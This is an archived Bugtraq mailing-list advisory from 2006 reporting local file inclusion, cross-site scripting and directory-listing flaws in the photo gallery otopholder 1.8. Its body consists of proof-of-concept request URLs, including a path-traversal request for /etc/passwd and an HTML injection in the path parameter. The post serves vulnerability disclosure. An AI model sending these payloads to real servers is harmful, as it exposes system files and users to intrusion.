[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln
- From: vampire_chiristof@xxxxxxxxx
- Date: 15 Aug 2006 10:43:38 -0000
vendor:
http://www.jakeo.com
vuln :
http://[host]/foto/index.php?path=../../etc/passwd
http://[host]/foto/index.php?path=<b>xss</b>
http://[host]/foto/index.php?path=../../[directory listing]
Author : Vampire
Vampire_chiristof@xxxxxxxxx
Homepage : Www.HackerZ.iR
Www.H4ckerZ.Com
Iran HackerZ Security Team